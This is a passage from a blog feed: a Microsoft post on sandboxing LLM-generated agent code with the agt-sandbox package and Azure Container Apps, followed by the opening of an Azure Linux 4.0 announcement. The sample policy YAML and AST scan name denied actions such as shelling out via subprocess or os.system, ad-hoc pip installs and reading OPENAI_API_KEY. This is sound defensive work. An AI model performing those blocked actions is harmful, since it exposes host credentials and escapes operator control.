&lt;P data-line="68"&gt;See -&amp;nbsp;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131&lt;/A&gt;&amp;nbsp;for more info on the service&lt;/P&gt;
&lt;P data-line="71"&gt;If you've used&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/azure/container-apps/sessions" target="_blank" rel="noopener" data-href="https://learn.microsoft.com/en-us/azure/container-apps/sessions"&gt;ACA Dynamic Sessions&lt;/A&gt;, Sandboxes are the next evolution and where new work should target.&lt;/P&gt;
&lt;H2 data-line="76"&gt;2. What's in the agt-sandbox package&lt;/H2&gt;
&lt;P data-line="78"&gt;agt-sandbox (PyPI:&amp;nbsp;&lt;A href="https://pypi.org/project/agt-sandbox/" target="_blank" rel="noopener" data-href="https://pypi.org/project/agt-sandbox/"&gt;agt-sandbox&lt;/A&gt;, import name:&amp;nbsp;agent_sandbox) is the execution-isolation layer of AGT. It is intentionally small. Its job is to take a snippet of agent- generated code and run it somewhere that is&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;your application process — under policy, with a structured result.&lt;/P&gt;
&lt;P data-line="84"&gt;The package contains:&lt;/P&gt;
&lt;UL data-line="86"&gt;
&lt;LI data-line="86"&gt;&lt;STRONG&gt;SandboxProvider&lt;/STRONG&gt;&amp;nbsp;— the abstract base class every backend implements (next section).&lt;/LI&gt;
&lt;LI data-line="88"&gt;&lt;STRONG&gt;Three built-in providers&lt;/STRONG&gt;, each gated behind an install extra so you only pull what you need:
&lt;UL data-line="90"&gt;
&lt;LI data-line="90"&gt;DockerSandboxProvider&amp;nbsp;— hardened OCI containers, with an optional auto-upgrade to gVisor or Kata when present (pip install "agt-sandbox[docker]").&lt;/LI&gt;
&lt;LI data-line="93"&gt;HyperLightSandboxProvider&amp;nbsp;— sub-millisecond&amp;nbsp;&lt;A href="https://github.com/hyperlight-dev/hyperlight" target="_blank" rel="noopener" data-href="https://github.com/hyperlight-dev/hyperlight"&gt;Hyperlight&lt;/A&gt;&amp;nbsp;micro-VMs over KVM / mshv / WHP (pip install "agt-sandbox[hyperlight]").&lt;/LI&gt;
&lt;LI data-line="96"&gt;ACASandboxProvider&amp;nbsp;— Azure Container Apps managed sandbox sessions (pip install "agt-sandbox[azure]");&amp;nbsp;&lt;STRONG&gt;the focus of this post&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI data-line="99"&gt;&lt;STRONG&gt;Shared dataclasses&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;SandboxConfig,&amp;nbsp;SandboxResult,&amp;nbsp;SessionHandle,&amp;nbsp;ExecutionHandle, plus&amp;nbsp;SessionStatus&amp;nbsp;/&amp;nbsp;ExecutionStatus&amp;nbsp;enums. Every provider returns these same types, so calling code never special-cases the backend.&lt;/LI&gt;
&lt;LI data-line="104"&gt;&lt;STRONG&gt;Policy-projection helpers&lt;/STRONG&gt; — small per-provider functions (docker_config_from_policy,&amp;nbsp;aca_config_from_policy, …) that translate the AGT&amp;nbsp;PolicyDocument&amp;nbsp;into provider-native settings (CPU / memory caps, egress rules, env vars).&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="112"&gt;3. The&amp;nbsp;SandboxProvider&amp;nbsp;ABC&lt;/H2&gt;
&lt;P data-line="114"&gt;SandboxProvider is the contract every backend implements. The abstract surface is deliberately minimal:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;class SandboxProvider(ABC): @abstractmethod def create_session(self, agent_id, policy=None, config=None) -&amp;gt; SessionHandle: ... @abstractmethod def execute_code(self, agent_id, session_id, code, *, context=None) -&amp;gt; ExecutionHandle: ... @abstractmethod def destroy_session(self, agent_id, session_id) -&amp;gt; None: ... @abstractmethod def is_available(self) -&amp;gt; bool: ...&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P data-line="132"&gt;Every method has an&amp;nbsp;*_async&amp;nbsp;variant that delegates to the sync implementation through&amp;nbsp;asyncio.to_thread&amp;nbsp;by default, so an async agent can call&amp;nbsp;await provider.execute_code_async(...)&amp;nbsp;without each provider having to ship its own event-loop story.&lt;/P&gt;
&lt;P data-line="137"&gt;The contract features four things, and writing against the ABC means you get all of them no matter which backend is plugged in:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Feature&lt;/th&gt;&lt;th&gt;What it means&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Per-session isolation&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;One&amp;nbsp;(agent_id, session_id)&amp;nbsp;pair maps to exactly one sandbox; concurrent agents do not share state&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Policy as a first-class argument&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;create_session&amp;nbsp;accepts a&amp;nbsp;PolicyDocument; the provider projects it onto its native primitives&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;gate&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Every&amp;nbsp;execute_code&amp;nbsp;call runs the evaluator&amp;nbsp;&lt;STRONG&gt;before&lt;/STRONG&gt;&amp;nbsp;dispatching code; denied calls never touch the backend&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Structured&amp;nbsp;SandboxResult&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Same success / exit_code / stdout / stderr / killed / kill_reason / duration_seconds shape from all backends&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="147"&gt;Per-session isolation is the right unit of granularity because a session is also the natural unit for blast radius and identity: within one session the agent's working state survives across execute_code calls (same (agent_id, session_id) → same sandbox in the provider's cache), and when the session is destroyed the sandbox is deleted with it. Different sessions get different sandboxes — create_session always provisions a fresh one and returns a new session_id, so there is no in-process pathway for state to flow from one session to the next.&lt;/P&gt;
&lt;P data-line="157"&gt;The hard isolation between two live sandboxes — that a compromised session cannot read another session's filesystem, memory, or network — is ultimately an&amp;nbsp;&lt;STRONG&gt;Azure platform guarantee&lt;/STRONG&gt;&amp;nbsp;about inter-sandbox isolation within a sandbox group, not something AGT itself enforces. The provider is a thin lifecycle driver.&lt;/P&gt;
&lt;P data-line="163"&gt;The abstraction matters in practice because&amp;nbsp;&lt;STRONG&gt;the same agent code works on every backend&lt;/STRONG&gt;. You write your planner against SandboxProvider and you choose Docker, Hyperlight for local sandboxes and ACA for managed cloud sandboxes — by swapping one constructor:&lt;/P&gt;
&lt;H2 data-line="171"&gt;4. The new&amp;nbsp;ACASandboxProvider&lt;/H2&gt;
&lt;P data-line="173"&gt;ACASandboxProvider&amp;nbsp;is the most recent addition in AGT. It drives the early-access&amp;nbsp;&lt;A href="https://github.com/microsoft/azure-container-apps" target="_blank" rel="noopener" data-href="https://github.com/microsoft/azure-container-apps"&gt;azure-containerapps-sandbox&lt;/A&gt;&amp;nbsp;Python SDK so an agent step can run in a managed Azure-side container without any of the usual infrastructure plumbing.&lt;/P&gt;
&lt;P data-line="179"&gt;Under the hood,&amp;nbsp;ACASandboxProvider&amp;nbsp;wires the three&amp;nbsp;SandboxProvider&amp;nbsp;lifecycle methods straight onto the ACA SDK. Here's what each one actually does for you:&lt;/P&gt;
&lt;P data-line="185"&gt;&lt;STRONG&gt;create_session(agent_id, policy=None, config=None)&lt;/STRONG&gt;&amp;nbsp;— provisions a fresh ACA sandbox for the agent and applies the policy's resource caps and egress allowlist.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;a&amp;nbsp;SessionHandle.&lt;/P&gt;
&lt;P data-line="189"&gt;&lt;STRONG&gt;execute_code(agent_id, session_id, code, *, context=None)&lt;/STRONG&gt;&amp;nbsp;— runs host-side policy checks, then executes the snippet inside the sandbox. A policy denial raises&amp;nbsp;PermissionError.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;an&amp;nbsp;ExecutionHandle&amp;nbsp;carrying a&amp;nbsp;SandboxResult.&lt;/P&gt;
&lt;P data-line="194"&gt;&lt;STRONG&gt;destroy_session(agent_id, session_id)&lt;/STRONG&gt;&amp;nbsp;— deletes the underlying ACA sandbox and evicts cached state.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;None.&lt;/P&gt;
&lt;P data-line="197"&gt;The lifecycle in code looks like this:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import os from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument policy = PolicyDocument.from_yaml("policies/aca_research_agent.yaml") provider = ACASandboxProvider( resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ["AZURE_REGION"], disk="python-3.13", # constructor-level, not per-session ensure_group_location=os.environ["AZURE_REGION"], ) # create_session takes (agent_id, policy=..., config=...). The policy carries # the network allowlist and the CPU/memory/timeout defaults. handle = provider.create_session("research-agent-1", policy=policy) # execute_code takes (agent_id, session_id, code, *, context=...). # The timeout is read from the session config that was projected from # policy.defaults.timeout_seconds at create_session time. exec_handle = provider.execute_code( "research-agent-1", handle.session_id, "import urllib.request as u; print(u.urlopen('https://arxiv.org').status)", context={"intent": "smoke-test arxiv reachability"}, ) print(exec_handle.result.stdout) provider.destroy_session("research-agent-1", handle.session_id)&lt;/LI-CODE&gt;
&lt;P data-line="232"&gt;ACA Sandboxes hit the sweet spot for a production agent platform on Azure: managed (no nodes or Kubernetes to operate), regional and autoscaled, fast enough for per-session creation, integrated with VNet / managed identity / Log Analytics, and rich enough on Azure-native primitives that the AGT policy bundle can be rendered into platform-level controls automatically.&lt;/P&gt;
&lt;H2 data-line="241"&gt;5. How&amp;nbsp;ACASandboxProvider&amp;nbsp;integrates with Agent governance toolkit policy&lt;/H2&gt;
&lt;P data-line="243"&gt;The provider's contribution to governance is that it makes a single&amp;nbsp;PolicyDocument&amp;nbsp;enforce in three different places, with the most expensive checks running last.&lt;/P&gt;
&lt;P data-line="247"&gt;&lt;STRONG&gt;Before any Azure round-trip (host-side, in your process):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="249"&gt;
&lt;LI data-line="249"&gt;The host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;(constructed once per session) evaluates&amp;nbsp;deny&amp;nbsp;rules over&amp;nbsp;code&amp;nbsp;/&amp;nbsp;tool_name,&amp;nbsp;tool_allowlist, and the per-call&amp;nbsp;context. A deny becomes&amp;nbsp;PermissionError. This runs on&amp;nbsp;&lt;STRONG&gt;every&lt;/STRONG&gt;&amp;nbsp;execute_code&amp;nbsp;call, so a denied step costs zero Azure cycles.&lt;/LI&gt;
&lt;LI data-line="254"&gt;enforce_no_subprocess_execution then walks the snippet's AST and raises SandboxCodeViolation if subprocess.*, os.system, os.execve, os.spawn*, or wildcard imports of those modules appear. This catches the cases where a contains rule misses (e.g. obfuscated imports, from subprocess import Popen as p).&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="260"&gt;&lt;STRONG&gt;At sandbox creation (Azure-side, once per session):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="262"&gt;
&lt;LI data-line="262"&gt;aca_config_from_policy&amp;nbsp;projects&amp;nbsp;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&amp;nbsp;onto the sandbox's CPU and memory ceilings.&lt;/LI&gt;
&lt;LI data-line="265"&gt;network_allowlist&amp;nbsp;plus&amp;nbsp;defaults.network_default&amp;nbsp;are turned into a typed&amp;nbsp;EgressPolicy(default_action="Deny", host_rules=[EgressHostRule(pattern, action="Allow"), …])&amp;nbsp;and applied via&amp;nbsp;SandboxClient.set_egress_policy. The policy is&amp;nbsp;&lt;STRONG&gt;fail-closed by default&lt;/STRONG&gt;&amp;nbsp;— even with an empty allowlist you get a sandbox with no outbound network.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="272"&gt;&lt;STRONG&gt;Per execution:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="274"&gt;
&lt;LI data-line="274"&gt;&lt;EM&gt;Azure-side, every call.&lt;/EM&gt;&amp;nbsp;The egress proxy enforces (4) on every outbound connection inside the sandbox. A blocked host produces an HTTP 403 inside the guest; the snippet's own error handler can detect that, and the provider's caller surfaces it as a&amp;nbsp;blocked-at-egress&amp;nbsp;outcome.&lt;/LI&gt;
&lt;LI data-line="279"&gt;&lt;EM&gt;Host-side, post-exec tripwire.&lt;/EM&gt;&amp;nbsp;After&amp;nbsp;SandboxClient.exec&amp;nbsp;returns, the provider compares the measured&amp;nbsp;duration_seconds&amp;nbsp;against&amp;nbsp;defaults.timeout_seconds&amp;nbsp;and, if the budget was exceeded, sets&amp;nbsp;result.killed=True&amp;nbsp;and a&amp;nbsp;kill_reason&amp;nbsp;on the returned&amp;nbsp;SandboxResult. This is an&amp;nbsp;&lt;STRONG&gt;advisory marker&lt;/STRONG&gt;, not a kill signal: the snippet has already finished, and the sandbox session itself stays alive and reusable. Acting on it (abandoning the session, surfacing a timeout decision) is the agent loop's job — see how run_step in section 6.3 turns it into a "timeout" receipt.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;One PolicyDocument, six enforcement points, three different locations. The model is never trusted; each guarantee is enforced by the component closest to the resource it protects.&lt;/P&gt;
&lt;H2 data-line="324"&gt;6. The example: an LLM-planned research agent&lt;/H2&gt;
&lt;P data-line="326"&gt;The agent does one thing: given a&amp;nbsp;&lt;EM&gt;research ticket&lt;/EM&gt;&amp;nbsp;— a small JSON document like&amp;nbsp;{"topic": "differential privacy", "depth": "survey"}&amp;nbsp;— produce a short literature summary. To do that it needs to (a) read papers from arXiv, (b) skim associated GitHub READMEs, and (c) optionally query a local search index. Nothing else.&lt;/P&gt;
&lt;P data-line="332"&gt;The interesting part is&amp;nbsp;&lt;STRONG&gt;how the agent decides what code to run&lt;/STRONG&gt;. A GPT-class planner is asked to break the ticket into a list of steps, each step a short Python snippet. Those snippets are then executed one at a time — each one passing through the six-point gauntlet from section 5.&lt;/P&gt;
&lt;H3 data-line="338"&gt;6.1 Install&lt;/H3&gt;
&lt;LI-CODE lang="python"&gt;# agt-sandbox with the Azure provider + the policy engine pip install "agt-sandbox[azure,policy]" # Early-access Azure Container Apps sandbox SDK pip install azure-containerapps-sandbox # Optional: only needed for the LLM planner in section 5.3 pip install openai&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;One-time Azure setup (resource group must already exist — the provider auto-creates the &lt;EM&gt;sandbox group&lt;/EM&gt; on first use, but not the resource group):&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;az login az group create --name agents-rg --location westus2 $env:AZURE_SUBSCRIPTION_ID = (az account show --query id -o tsv) $env:AZURE_RG = "agents-rg" $env:AZURE_REGION = "westus2"&lt;/LI-CODE&gt;
&lt;P&gt;Quick smoke check:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument print("ok")&lt;/LI-CODE&gt;
&lt;P&gt;Ignore the deprecated warning here. The packages are in the midst of migration and will be fixed soon. &amp;nbsp;&lt;/P&gt;
&lt;H3 data-line="374"&gt;6.2 The policy&lt;/H3&gt;
&lt;P data-line="376"&gt;aca_research_agent.yaml&amp;nbsp;— every field is a&amp;nbsp;&lt;STRONG&gt;native&amp;nbsp;PolicyDocument&amp;nbsp;field&lt;/STRONG&gt;, no Python wrapper:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;name: research-agent version: "2" defaults: action: allow max_cpu: 1.0 # → sandbox CPU cap = 1000 millicores max_memory_mb: 2048 # → sandbox memory cap = 2048 MiB timeout_seconds: 90 # per-execute_code wall-clock kill network_default: deny # fail-closed (also the schema default) network_allowlist: - api.openai.com - api.arxiv.org - export.arxiv.org - "*.github.com" - pypi.org - files.pythonhosted.org tool_allowlist: - fetch_arxiv - fetch_github_readme - search_index rules: - name: deny-shell-out-subprocess condition: { field: code, operator: contains, value: "subprocess" } action: deny priority: 100 message: "shell-out blocked by research-agent policy" - name: deny-pip-install condition: { field: code, operator: contains, value: "pip install" } action: deny priority: 100 message: "ad-hoc dependency installs are not permitted" - name: deny-secret-openai condition: { field: code, operator: contains, value: "OPENAI_API_KEY" } action: deny priority: 100 message: "agents may not read host credentials" # Tool-allowlist gate. Fires only when the eval context carries a # `tool_name` — untagged execute_code calls are unaffected. - name: deny-tool-not-in-allowlist condition: field: tool_name operator: not_in value: [fetch_arxiv, fetch_github_readme, search_index] action: deny priority: 200 message: "tool not in research-agent tool_allowlist"&lt;/LI-CODE&gt;
&lt;P data-line="434"&gt;Two properties to keep in mind:&lt;/P&gt;
&lt;OL data-line="436"&gt;
&lt;LI data-line="436"&gt;&lt;STRONG&gt;Network is fail-closed.&lt;/STRONG&gt;&amp;nbsp;Any host not on&amp;nbsp;network_allowlist&amp;nbsp;is denied at the Azure egress proxy. An empty allowlist produces a sandbox with no outbound network.&lt;/LI&gt;
&lt;LI data-line="439"&gt;&lt;STRONG&gt;tool_allowlist&amp;nbsp;only fires when the call is tagged.&lt;/STRONG&gt;&amp;nbsp;Plain&amp;nbsp;execute_code_async(...)&amp;nbsp;has no&amp;nbsp;tool_name. Calls that pass&amp;nbsp;context={"tool_name": "evil_tool"}&amp;nbsp;get denied host-side.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="443"&gt;Validate before committing:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;python -m agent_os.policies.cli validate aca_research_agent.yaml # OK&lt;/LI-CODE&gt;
&lt;H3 data-line="448"&gt;6.3 The agent&lt;/H3&gt;
&lt;LI-CODE lang="python"&gt;import asyncio, json, os, time, uuid from dataclasses import dataclass from agent_os.policies import PolicyDocument from agent_sandbox import ACASandboxProvider from openai import AsyncOpenAI @dataclass class Step: index: int; intent: str; code: str @dataclass class StepReceipt: step_index: int; intent: str decision: str # allowed | denied-by-policy | blocked-at-egress | timeout | error reason: str | None azure_sandbox_id: str duration_seconds: float stdout_excerpt: str PLANNER_SYSTEM = """You are a research planner. Output JSON of the form {"steps":[{"intent": str, "code": str}, ...]} where each `code` is self-contained Python using only the standard library (use urllib.request for HTTP, not requests). Snippets may reach: api.arxiv.org, export.arxiv.org, *.github.com, pypi.org. No installs, no shell, no secrets.""" async def plan(client: AsyncOpenAI, ticket: dict) -&amp;gt; list[Step]: resp = await client.chat.completions.create( model="gpt-4o-mini", response_format={"type": "json_object"}, messages=[ {"role": "system", "content": PLANNER_SYSTEM}, {"role": "user", "content": json.dumps(ticket)}, ], ) plan = json.loads(resp.choices[0].message.content) return [Step(i, s["intent"], s["code"]) for i, s in enumerate(plan["steps"])] async def run_step(provider, agent_id, session_id, step: Step) -&amp;gt; StepReceipt: started = time.monotonic() try: exec_handle = await provider.execute_code_async( agent_id, session_id, step.code, context={"step_index": step.index, "intent": step.intent}, ) except PermissionError as exc: return StepReceipt(step.index, step.intent, "denied-by-policy", str(exc), session_id, time.monotonic() - started, "") res = exec_handle.result combined = (res.stdout or "") + (res.stderr or "") egress_block = "egress-blocked" in combined or "HTTP Error 403" in combined if getattr(res, "killed", False): decision, reason = "timeout", getattr(res, "kill_reason", "timeout") elif egress_block: decision, reason = "blocked-at-egress", "Azure egress proxy denied a host" elif res.success: decision, reason = "allowed", None else: decision, reason = "error", (res.stderr or "").strip()[:200] return StepReceipt( step.index, step.intent, decision, reason, session_id, time.monotonic() - started, (res.stdout or "").strip()[:200], ) async def main(ticket_path: str) -&amp;gt; None: ticket = json.loads(open(ticket_path, encoding="utf-8").read()) policy = PolicyDocument.from_yaml("aca_research_agent.yaml") missing = [k for k in ("AZURE_SUBSCRIPTION_ID", "AZURE_RG") if not os.environ.get(k)] if missing: raise SystemExit(f"missing env vars: {', '.join(missing)}") provider = ACASandboxProvider( subscription_id=os.environ["AZURE_SUBSCRIPTION_ID"], resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ.get("AZURE_REGION", "westus2"), disk="python-3.13", ensure_group_location=os.environ.get("AZURE_REGION", "westus2"), ) if not provider.is_available(): raise SystemExit(provider.unavailable_reason) agent_id = f"research-{uuid.uuid4().hex[:6]}" handle = await provider.create_session_async(agent_id, policy=policy) try: steps = await plan(AsyncOpenAI(), ticket) receipts = [await run_step(provider, agent_id, handle.session_id, s) for s in steps] print(json.dumps([r.__dict__ for r in receipts], indent=2, default=str)) finally: await provider.destroy_session_async(agent_id, handle.session_id) if __name__ == "__main__": import sys asyncio.run(main(sys.argv[1]))&lt;/LI-CODE&gt;
&lt;P&gt;Run it against {"topic": "differential privacy", "depth": "survey"} and you get a JSON array of receipts on stdout — one per planner step. A typical five-step plan produces output along the lines of:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;[ {"step_index": 0, "intent": "fetch arXiv search results", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 1.42, "stdout_excerpt": "{\"feed\": {\"entry\": [{\"id\": \"http://arxiv.org/abs/2201.12345v2\", ..."}, {"step_index": 1, "intent": "download README for top GitHub repo", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.88, "stdout_excerpt": "# opendp\n\nThe OpenDP Library is a modular collection..."}, {"step_index": 2, "intent": "shell out to grep README", "decision": "denied-by-policy", "reason": "Policy denied: shell-out blocked by research-agent policy", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.003, "stdout_excerpt": ""}, {"step_index": 3, "intent": "fetch related blog post from third-party site", "decision": "blocked-at-egress", "reason": "Azure egress proxy denied a host", "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.41, "stdout_excerpt": "egress-blocked HTTPError HTTP Error 403: Forbidden"}, {"step_index": 4, "intent": "summarize collected abstracts", "decision": "allowed", "reason": null, "azure_sandbox_id": "sb-7f4a92...", "duration_seconds": 0.32, "stdout_excerpt": "Summary: differential privacy research in 2024-2026..."} ]&lt;/LI-CODE&gt;
&lt;P data-line="586"&gt;Three things to notice:&lt;/P&gt;
&lt;UL data-line="588"&gt;
&lt;LI data-line="588"&gt;Step 2 (subprocess) was rejected&amp;nbsp;&lt;STRONG&gt;host-side&lt;/STRONG&gt;&amp;nbsp;in ~3 ms with no Azure round-trip —&amp;nbsp;duration_seconds&amp;nbsp;and the empty&amp;nbsp;stdout_excerpt&amp;nbsp;confirm it never left the host process.&lt;/LI&gt;
&lt;LI data-line="591"&gt;Step 3 went to Azure but the egress proxy returned HTTP 403; the caller's&amp;nbsp;try/except&amp;nbsp;converted that into a clean&amp;nbsp;blocked-at-egress&amp;nbsp;decision instead of a hard failure.&lt;/LI&gt;
&lt;LI data-line="594"&gt;The session survives both rejections. Step 4 still runs to completion — denials and egress blocks do not poison the sandbox.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="593"&gt;What you've enforced&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Concern&lt;/th&gt;&lt;th&gt;Where enforced&lt;/th&gt;&lt;th&gt;Mechanism&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Shell-out, pip-install, credential exfiltration&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;PolicyDocument&amp;nbsp;deny&amp;nbsp;rules →&amp;nbsp;PermissionError&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Subprocess invocation that slips past substring rules&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;enforce_no_subprocess_execution&amp;nbsp;AST scan →&amp;nbsp;SandboxCodeViolation&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Calls to tools outside the allowlist&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;deny-tool-not-in-allowlist&amp;nbsp;rule&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Outbound traffic to disallowed hosts&lt;/td&gt;&lt;td&gt;Azure egress proxy&lt;/td&gt;&lt;td&gt;network_allowlist&amp;nbsp;→&amp;nbsp;EgressPolicy&amp;nbsp;(Deny + per-host Allow)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CPU / memory ceiling&lt;/td&gt;&lt;td&gt;Azure sandbox VM&lt;/td&gt;&lt;td&gt;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Per-step wall-clock tripwire&lt;/td&gt;&lt;td&gt;Host, post-exec (advisory)&lt;/td&gt;&lt;td&gt;defaults.timeout_seconds&amp;nbsp;→&amp;nbsp;SandboxResult.killed=True&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Audit trail&lt;/td&gt;&lt;td&gt;Host process&lt;/td&gt;&lt;td&gt;Per-step receipts from&amp;nbsp;run_step&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="611"&gt;The model is never trusted. Each guarantee is enforced by the component closest to the resource it protects, and a single signed PolicyDocument drives all of them.&lt;/P&gt;
&lt;H2 data-line="619"&gt;Closing thoughts&lt;/H2&gt;
&lt;P data-line="627"&gt;A few things worth keeping in mind:&lt;/P&gt;
&lt;UL data-line="629"&gt;
&lt;LI data-line="629"&gt;&lt;STRONG&gt;One&amp;nbsp;PolicyDocument&amp;nbsp;is the artefact.&lt;/STRONG&gt;&amp;nbsp;Host-side rules, AST scan, ACA egress proxy, CPU / memory caps, timeouts — all driven by one YAML file. Treat it like code: review it, diff it, and validate it in CI.&lt;/LI&gt;
&lt;LI data-line="633"&gt;&lt;STRONG&gt;Fail-closed by default.&lt;/STRONG&gt;&amp;nbsp;ACA's&amp;nbsp;network_default: deny&amp;nbsp;is the setting you want. Every host the agent reaches should be in the allowlist, by name, in a reviewable diff.&lt;/LI&gt;
&lt;LI data-line="636"&gt;&lt;STRONG&gt;Read the receipts.&lt;/STRONG&gt;&amp;nbsp;StepReceipt&amp;nbsp;JSON is the audit trail. Pipe it into Log Analytics and alert on&amp;nbsp;denied-by-policy&amp;nbsp;and&amp;nbsp;blocked-at-egress&amp;nbsp;spikes — they're either attacks or planner regressions.&lt;/LI&gt;
&lt;LI data-line="640"&gt;&lt;STRONG&gt;The model is never trusted.&lt;/STRONG&gt;&amp;nbsp;Every check in this post exists because the moment you trust the model, you've also trusted whatever fed it its last few tokens.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="644"&gt;The project lives at&amp;nbsp;&lt;A href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener" data-href="https://github.com/microsoft/agent-governance-toolkit"&gt;github.com/microsoft/agent-governance-toolkit&lt;/A&gt;. Issues, PRs, and war stories welcome.&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 22:40:19 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</guid>
      <dc:creator>amolravande</dc:creator>
      <dc:date>2026-06-05T22:40:19Z</dc:date>
    </item>
    <item>
      <title>Announcing Azure Linux 4.0: Purpose-Built for Azure, Now in Public Preview</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/announcing-azure-linux-4-0-purpose-built-for-azure-now-in-public/ba-p/4524267</link>
      <description>&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Today at Microsoft Build, we're announcing the &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;public preview of Azure Linux 4.0&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; - Microsoft's first party Linux distribution, purpose-built for Azure. Azure Linux 4.0 is available now for Azure Virtual Machines, VM Scale Sets, and container images – with Azure Kubernetes Service (AKS) support and Windows Subsystem for Linux (WSL) coming soon after.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
